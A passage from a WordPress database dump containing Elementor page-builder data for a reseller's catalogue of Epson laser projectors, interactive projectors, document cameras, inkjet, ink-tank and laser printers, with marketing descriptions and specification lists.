EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour\\/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.<\\/p><ul><li>5,000 lumens colour\\/white brightness<sup>\\u00a0<\\/sup><\\/li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio<\\/li><li>Laser light source of up to 20,000 hours<\\/li><li>Virtually maintenance-free for optical engine life<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd625e2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8750887\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c4ec64b\",\"elType\":\"widget\",\"settings\":{\"title\":\"ACCENT LIGHTING LASER PROJECTORS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5f02a57\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"993393a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e46d09c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson LightScene EV-105<\\/strong><\\/p><p><img class=\\\"wp-image-2437 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-LightScene-EV-105.jpg\\\" alt=\\\"\\\" width=\\\"263\\\" height=\\\"176\\\" \\/><\\/p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and d\\u00e9cor applications. Designed to blend in discreetly to any setting \\u2014 from retail, hospitality and event spaces to showrooms and museums \\u2014 LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.<\\/p><ul><li>Laser projector for digital art and signage<\\/li><li>Seamlessly blends into virtually any environment<\\/li><li>Up to 20,000 hours of virtually maintenance-free operation<\\/li><li>360-degree mounting: floors, walls or ceilings<\\/li><li>Remote management and control tools<\\/li><li>Best New Award Overall<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b9132fb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5a3decf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ccb5acc\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"45f89fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7ec2bf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>ULTRA PORTABLE<\\/h3><p><strong>Epson EB-1785W\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2438\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-1785W.png\\\" alt=\\\"\\\" width=\\\"236\\\" height=\\\"133\\\" \\/><\\/p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.<\\/p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens<\\/li><li>WXGA Resolution<\\/li><li>Real-Time Auto Keystone Correction<\\/li><li>Split Screen Projection<\\/li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1914d98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b5f42fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e3f8c24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d81ddc4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"890a1d6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INTERACTIVE\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c314a77\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fbcb210\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1897c27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-536Wi\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2439\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-536Wi.png\\\" alt=\\\"\\\" width=\\\"242\\\" height=\\\"136\\\" \\/><\\/p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.<\\/p><ul><li>White and Colour Brightness at 3,400lm<\\/li><li>WXGA Resolution<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity<\\/li><li>Pen Interactivity<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a597712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d315157\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson 595Wi\\/585Wi\\/575Wi<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2440\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-595Wi.png\\\" alt=\\\"\\\" width=\\\"276\\\" height=\\\"155\\\" \\/><\\/p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.<\\/p><ul><li>WXGA Resolution<\\/li><li>White and Colour Brightness at 3,300lm<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity x2<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"de8ca10\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"61ea7aa\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e5676d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"281e34f\",\"elType\":\"widget\",\"settings\":{\"title\":\"HIGH BRIGHTNESS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a49451\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f301a8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7e2436\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-L1405UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2441\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/EB-L1405UNL.png\\\" alt=\\\"\\\" width=\\\"207\\\" height=\\\"117\\\" \\/><\\/p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000\\u00a0long lasting hours maintenance-free.<\\/p><ul><li>White and Colour Brightness at 8,000lm<\\/li><li>WUXGA (1920 x 1200)<\\/li><li>Edge-blending to create large panoramic images<\\/li><li>Curve and corner wall projection<\\/li><li>HDBaseT<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dd3bc89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6d9f7b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-G7400UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2442\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-G7400UNL.png\\\" alt=\\\"\\\" width=\\\"205\\\" height=\\\"116\\\" \\/><\\/p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fine\\u2122 and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projector\\u2019s astoundingly short throw ratio of 0.35*.<\\/p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.<\\/em><\\/p><ul><li>High Brightness<\\/li><li>Beyond Full HD Resolution<\\/li><li>Powered Lens<\\/li><li>Portrait Projection<\\/li><li>Flexible Installation<\\/li><li>Edge Blending<\\/li><li>Point Correction<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2860f60\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abe0604\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-Z10000U\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2443\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-Z10000U.png\\\" alt=\\\"\\\" width=\\\"208\\\" height=\\\"117\\\" \\/><\\/p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.<\\/p><ul><li>White and Colour Brightness at 10,000\\u00a0lm<\\/li><li>WUXGA resolution<\\/li><li>High Reliability and Durability<\\/li><li>Suitable for 24\\/7 usage<\\/li><li>Flexible projection angles and installations<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6e2f23c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1be2016\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ccccf17\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>DOCUMENT CAMERAS<\\/h3><p><strong>Document Camera ELPDC21\\u00a0<\\/strong><img src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Document-Camera-ELPDC21.jpg\\\" alt=\\\"\\\" width=\\\"206\\\" height=\\\"137\\\" \\/><\\/p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.<\\/p><ul><li>Pixels: 2MP (1920 x 1080 pixels)<\\/li><li>Camera Sensor: 1\\/2.7 inch CMOS Sensor<\\/li><li>Resolution: Up to Full HD (1080p)<\\/li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom<\\/li><li>Weight: Approx 3.0kg<\\/li><\\/ul><p>[maxbutton id=\\\"12\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d5e60a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b6a1050\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(7818,3460,'_elementor_version','2.5.14'),(7821,3461,'_wp_page_template','template-fullwidth.php'),(7822,3461,'_elementor_edit_mode','builder'),(7823,3461,'_elementor_template_type','post'),(7824,3461,'_elementor_data','[{\"id\":\"0bcf275\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"829ac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2449815\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.<\\/p><h2>Printers for Work<\\/h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2698f52\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"93fa1d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f872ca9\",\"elType\":\"widget\",\"settings\":{\"title\":\"BUSINESS INKJET PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2a74bb0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"245ffff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"12a92f5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Enterprise WF-C17590\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2417\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Enterprise-WF-C17590.jpg\\\" alt=\\\"\\\" width=\\\"366\\\" height=\\\"207\\\" \\/><\\/p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCore\\u2122, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.<\\/p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax<\\/li><li>Ink: DURABrite<sup>TM<\\/sup>\\u00a0Pro pigment ink cartridges<\\/li><li>ISO Print Speed: 75 ISO ppm (black\\/colour) simplex\\/duplex<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d99a531\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"51d6ae3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3a12efc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ffeb9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Pro WF-C5290\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2418\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Pro-WF-C5290.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.<\\/p><ul><li>High yield ink packs<\\/li><li>High-speed auto-duplex printing<\\/li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li><li>Epson Connect<\\/li><li>Energy\\u00a0saving<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f78e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"94b61d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b740aaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-100\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2419\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-100.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.<\\/p><ul><li>Print speed up to 14 ppm<\\/li><li>Epson Connect<\\/li><li>1.44 Colour LCD Panel<\\/li><li>Wi-Fi and Wi-Fi Direct connectivity<\\/li><li>Built-in battery<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"96730a6\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":49,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"addc0f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2b0e3f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"e754d94\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fc3866b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-7711<\\/strong><\\/h4>\\n<img class=\\\"wp-image-2420 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-7711.png\\\" alt=\\\"\\\" width=\\\"304\\\" height=\\\"172\\\" \\/><br>\\n\\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM<\\/sup>\\u00a0technology, fast printing speed consistently delivers success in every detail.\\n<ul>\\n \\t<li>Print speeds up to 18ipm for black and 10ipm for colour<\\/li>\\n \\t<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li>\\n \\t<li>Duplex printing up to A3 size<\\/li>\\n \\t<li>Epson DURABrite<sup>TM<\\/sup>\\u00a0Ultra ink<\\/li>\\n \\t<li>4.3\\u201d Colour LCD Touch Panel<\\/li>\\n \\t<li>Print, Scan, Copy Fax with ADF<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5178d20\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b031280\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b3a013d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f2b7b04\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c71ec36\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"732a1a6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INK TANK SYSTEM\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e709cb3\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"60cd262\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97d2102\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EcoTank L3150<\\/strong><\\/h4><p><img class=\\\"wp-image-2421 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EcoTank-L3150-.jpg\\\" alt=\\\"\\\" width=\\\"311\\\" height=\\\"175\\\" \\/><\\/p><p>Save more with Epson\\u2019s economical and multifunctional printing solutions for business\\u2014the EcoTank L3150\\u2014built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High yield ink bottles<\\/li><li>Spill-free, error-free refilling<\\/li><li>Wi-Fi, Wi-Fi Direct<\\/li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)<\\/li><li>Borderless printing up to 4R<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"63366b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8449cce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L120 Printer\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2422\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L120-Printer.png\\\" alt=\\\"\\\" width=\\\"301\\\" height=\\\"170\\\" \\/><\\/h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.<\\/p><ul><li>High-yield ink bottles<\\/li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color<\\/li><li>Compact Size<\\/li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9109035\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":164,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"140f583\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7d56d33\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a539e2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson M1100 Printer<\\/strong><\\/h4><p><img class=\\\"wp-image-2423 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-M1100-Printer-.png\\\" alt=\\\"\\\" width=\\\"315\\\" height=\\\"178\\\" \\/><\\/p><p>Efficiency\\u00a0meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pages\\u00a0each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High-yield pigment ink bottle<\\/li><li>Spill-free, error-free refilling<\\/li><li>Print speed up to 32ppm (15ipm)<\\/li><li>4 years warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e74569a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"e157d4e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ffcc87\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c140b6d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0c8225a\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"b3a6fcb\",\"elType\":\"widget\",\"settings\":{\"title\":\"LASER PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a7c8449\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"650cf58\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"82105a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson AcuLaser C9300N<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2424\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-AcuLaser-C9300N.png\\\" alt=\\\"\\\" width=\\\"313\\\" height=\\\"177\\\" \\/><\\/p><p>The Epson AcuLaser\\u2122 C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Speed: Up to 30ppm<\\/li><li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)<\\/li><li>Quality prints with new Epson Technologies<\\/li><li>New print job management features<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ee8d71a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8295a6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"22e2324\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">\\u00a0<strong>Epson WorkForce AL-M320DN\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2426\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M320DN-.jpg\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"296\\\" \\/><\\/p><p>The Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Print speed up to 35ppm<\\/li><li>Auto-Duplex<\\/li><li>Ethernet &amp; Epson iPrint<\\/li><li>2 optional paper cassette tray<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e06a550\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49ae59d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6612146\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: 